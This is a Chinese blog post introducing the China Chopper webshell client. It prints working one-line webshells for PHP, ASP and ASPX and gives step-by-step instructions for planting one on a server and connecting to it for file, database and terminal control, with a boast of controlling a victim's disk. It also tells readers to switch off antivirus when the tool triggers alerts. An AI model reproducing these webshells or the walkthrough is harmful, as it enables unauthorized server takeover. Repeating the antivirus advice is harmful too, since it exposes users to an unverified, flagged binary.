中国菜刀,webshell切菜专用

中国菜刀,一个非常好用而又强大的webshell,它可不是用来切菜的做饭的道具哦,是一款专业的网站管理软件,小巧又实用!不过被不法分子利用到,就是一个黑站的利器了。

  • 1.中国菜刀支持的服务端脚本:PHP、ASP;
  • 2.主要功能有:文件管理(有足够的权限时候可以管理整个磁盘/文件系统),数据库管理,虚拟终端。
  • 3.菜刀的工作原理是:利用上传到服务器的一句话脚本再通过一些添加配置就可以工作了。

第一步:我们首先要新建一个php文件,文件名随意取,然后写入一句代码:<?php eval($_POST[‘cmd’]); ?>  ;eval()这个函数大家并不陌生吧,就是把里面的字符串作为PHP代码执行。最后把这个文件保存,上传到你站点里面,可以是根目录,也可以是其他,都行的。如果使用的是phpstudy,就下载到WWW目录里,这里只演示了如何创建一句话木马的代码,并没有上传到根目录。

PHP一句话木马:<?php @eval($_POST[‘cmd’]);?>

ASP一句话木马:<%eval request[‘cmd’]%>

ASPX一句话木马:<%@ Page Language=”Jscript”%><%eval(Request.Item[“cmd”],”unsafe”);%>

眼尖的童鞋已经看到了三个里面都带有cmd这个单词,没错这个就是密码,大家可以自行修改为自己使用的密码。

第二步:打开菜刀这个软件,进入如下界面,右键点击“添加”;如下图:


第三步:此时会弹出一个添加shell的对话框,由图一看出我的文件名为“yjh.php”,所以这里的地址填为:http://localhost/yjh.php 。地址后面的小框框里面的“cmd”就是你的“口令”,也就是<?php eval($_POST[‘cmd’]); ?> 这里的“cmd”。下面配置项如果你知道用户名密码就填,不知道,不填,也不会影响文件管理和虚拟终端这两个功能,只是不能查看数据库了。



最后:点击“添加”按钮,成功后就会产生一条新的记录,鼠标右键点击就可以进行操作了,如下图,可以进行文件管理,数据库管理,虚拟终端。哈哈…大功告成!!


效果图展示(可以控制对方电脑硬盘):

在下面附上菜刀的下载链接,评论后可下载

最后说明一下:此软件打开时杀毒软件可能会报毒的,有虚拟机条件最好用虚拟机,若没有虚拟机的小伙伴也不用担心,关掉自己的杀毒软件就可以了,本人已亲自使用多次,可放心使用。

隐藏内容,您需要满足以下条件方可查看
End

人已赞赏
文章分享

虚拟视频摄像头工具

2020-3-14 20:41:39

文章分享

万兴数据恢复 Wondershare

2020-3-16 15:06:44

2 条回复 A文章作者 M管理员
  1. 好东西

  2. 11

个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索